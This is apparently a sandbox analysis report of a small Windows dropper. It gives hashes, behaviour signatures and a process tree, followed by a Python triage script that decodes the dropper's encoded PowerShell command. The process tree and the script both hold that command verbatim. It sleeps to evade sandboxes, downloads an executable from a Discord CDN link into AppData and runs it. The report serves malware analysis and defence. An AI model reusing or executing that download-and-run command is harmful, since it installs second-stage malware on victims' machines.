Analysis
max time kernel: 119s
max time network: 121s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 24-12-2023 10:18
Static task: static1
Behavioral task: behavioral1
  Sample: SecuriteInfo.com.Trojan.DownLoader45.55850.3832.exe
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: SecuriteInfo.com.Trojan.DownLoader45.55850.3832.exe
  Resource: win10v2004-20231215-en
General
Target: SecuriteInfo.com.Trojan.DownLoader45.55850.3832.exe
Size: 6KB
MD5: d0c32ff1da809dda5724a90a5dd80ff5
SHA1: 18f52952e62edb4ef0d31fa3b1aecb8678ccde1a
SHA256: 1a2e7d970dea301dc3480138506bf76dc01f82150ed8224a3f44136a777ce3a4
SHA512: 714cc6a0838f4dbb768632b4697c69f721badf0ee8169277c85a9cbdceff0fa668355767c7c8790ee605566f2deeeb87d4a7415bd34a3b8fd151cb4b6a54d3cb
SSDEEP: 96:LBuY79i8CFy0sMxb06jhIUqku4/tzNtUqEu45K/9gad3ojorl:LBuO9inFRreUqkuIhNtUqEu7Vgadv
Malware Config
Signatures
Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  3     1624  powershell.exe
  4     1624  powershell.exe
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  1624  powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  1624  powershell.exe
Suspicious use of WriteProcessMemory (3 IoCs)
  description                       pid   Process                                              procid_target
  PID 2988 wrote to memory of 1624  2988  SecuriteInfo.com.Trojan.DownLoader45.55850.3832.exe  29
  PID 2988 wrote to memory of 1624  2988  SecuriteInfo.com.Trojan.DownLoader45.55850.3832.exe  29
  PID 2988 wrote to memory of 1624  2988  SecuriteInfo.com.Trojan.DownLoader45.55850.3832.exe  29
Processes
1. C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader45.55850.3832.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader45.55850.3832.exe"
   PID: 2988
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 2988)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAcQB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgAMAA2ADYANgAzADYAOQA3ADIAMwA2ADAAMAA4AC8AMQAxADgANwA4ADAANgA3ADUANgA0ADAAOAAxADQANwA5ADgAOAAvAG0AdQBjAGsAXwBpAHQAcAAuAGUAeABlAD8AZQB4AD0ANgA1ADkAOAAzAGEAMwBmACYAaQBzAD0ANgA1ADgANQBjADUAMwBmACYAaABtAD0ANwA0ADgAZgA4AGIAZgBiADMAZABmADAAOQBmADYAOQA1ADgAMABkAGEANQA4ADYAMwAyADEANQBhADAAOABhAGIAMgAzAGEAMwA5AGEAMgBmADYANQA2ADMAOQBmAGMAYQA4AGYAMwBkADEAYgA2ADUAYQBiAGEAZABlADkANgAmACcALAAgADwAIwB2AHIAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGIAagBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAdwBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADYANwBXAGkAbgBkAG8AdwBzAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAKQA8ACMAdABnAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBrAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAaAByACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADYANwBXAGkAbgBkAG8AdwBzAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAPAAjAHEAbAByACMAPgA="
      PID: 1624
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
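The whole behaviour of this 6KB dropper is the PowerShell one-liner hidden in the -EncodedCommand argument above, so the first triage step is to decode it. Two details trip people up: -EncodedCommand is base64 over UTF-16LE (decoding it as UTF-8 gives NUL-interleaved text), and this sample pads the script with throwaway block comments (<#yqy#>, <#vrp#>, ...) placed between cmdlet parameters to defeat string and hash signatures. The script below is an added example for this report, not part of the sandbox output; it embeds the encoded command verbatim, decodes it, strips the junk comments and pulls out the download URL, the drop name under $env:AppData, the 60 second sandbox-evasion sleep and the download-then-execute pattern. The helper that reads the ex= and is= query parameters as hex Unix timestamps relies on the Discord CDN link-signing convention, which is an assumption about the CDN, not something the report states; the IOC regexes are ad hoc and tuned to this one-liner.

```python
import base64
import re
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlparse

# The -EncodedCommand argument, copied verbatim from the process tree in the report.
ENCODED_COMMAND = "PAAjAHkAcQB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA2ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADEAOAA3ADgAMAA2ADYANgAzADYAOQA3ADIAMwA2ADAAMAA4AC8AMQAxADgANwA4ADAANgA3ADUANgA0ADAAOAAxADQANwA5ADgAOAAvAG0AdQBjAGsAXwBpAHQAcAAuAGUAeABlAD8AZQB4AD0ANgA1ADkAOAAzAGEAMwBmACYAaQBzAD0ANgA1ADgANQBjADUAMwBmACYAaABtAD0ANwA0ADgAZgA4AGIAZgBiADMAZABmADAAOQBmADYAOQA1ADgAMABkAGEANQA4ADYAMwAyADEANQBhADAAOABhAGIAMgAzAGEAMwA5AGEAMgBmADYANQA2ADMAOQBmAGMAYQA4AGYAMwBkADEAYgA2ADUAYQBiAGEAZABlADkANgAmACcALAAgADwAIwB2AHIAcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGIAagBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAdwBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADYANwBXAGkAbgBkAG8AdwBzAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAKQA8ACMAdABnAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBrAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHoAaAByACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADYANwBXAGkAbgBkAG8AdwBzAFMAZQByAHYAaQBjAGUALgBlAHgAZQAnACkAPAAjAHEAbAByACMAPgA="


def decode_encoded_command(b64: str) -> str:
    """powershell.exe -EncodedCommand is base64 over UTF-16LE text, so the
    bytes must be decoded as a wide string to get what PowerShell executes."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_block_comments(script: str) -> str:
    """Remove <# ... #> block comments. Here they hold only random
    three-letter tokens wedged between parameters, i.e. signature junk;
    PowerShell ignores them, so removing them does not change behaviour."""
    return re.sub(r"<#.*?#>", "", script, flags=re.DOTALL)


def extract_iocs(script: str) -> dict:
    """Ad hoc indicator extraction for a download-and-execute one-liner."""
    urls = re.findall(r"https?://[^\s'\"]+", script)
    sleeps = [int(s) for s in re.findall(r"Start-Sleep\s+-Seconds\s+(\d+)", script, re.I)]
    drop_names = re.findall(r"-ChildPath\s+'([^']+)'", script)
    return {
        "urls": urls,
        "hosts": [urlparse(u).netloc for u in urls],
        "sleep_seconds": sleeps,
        "drop_names": sorted(set(drop_names)),
        # DownloadFile followed by Start-Process is the classic dropper shape.
        "download_and_execute": "DownloadFile" in script and "Start-Process" in script,
    }


def discord_link_window(url: str) -> tuple:
    """Assumption (Discord CDN link-signing convention, not from the report):
    signed attachment links carry is= (issued) and ex= (expiry) as hex Unix
    timestamps. Returns (issued, expiry) as UTC datetimes, which tells you
    how long the payload URL stayed fetchable."""
    q = parse_qs(urlparse(url).query)
    issued = datetime.fromtimestamp(int(q["is"][0], 16), tz=timezone.utc)
    expiry = datetime.fromtimestamp(int(q["ex"][0], 16), tz=timezone.utc)
    return issued, expiry


def analyse(b64: str) -> dict:
    """Decode, de-junk and summarise one -EncodedCommand value."""
    raw = decode_encoded_command(b64)
    clean = strip_block_comments(raw)
    result = extract_iocs(clean)
    result["junk_comments"] = re.findall(r"<#(.*?)#>", raw, flags=re.DOTALL)
    result["script"] = clean
    return result


if __name__ == "__main__":
    r = analyse(ENCODED_COMMAND)
    print(r["script"])
    for key in ("hosts", "sleep_seconds", "drop_names", "junk_comments"):
        print(f"{key}: {r[key]}")
    issued, expiry = discord_link_window(r["urls"][0])
    print(f"payload link issued {issued:%Y-%m-%d}, expires {expiry:%Y-%m-%d}")
```

Running it shows the cleaned script: a 60 second Start-Sleep (long enough to outlast a short sandbox run, which is why the report records 119s of kernel time for a 6KB file), a WebClient.DownloadFile of muck_itp.exe from cdn.discordapp.com into %AppData%\67WindowsService.exe, then Start-Process on that file. The "Blocklisted process makes network request" and "Enumerates physical storage devices" signatures are both attributable to that powershell.exe child (PID 1624), not to the dropper itself. Because the signed link expired about two weeks after it was issued, the second-stage payload is unlikely to be retrievable from the URL now; the SHA256 of the dropper and the %AppData% drop name are the durable indicators.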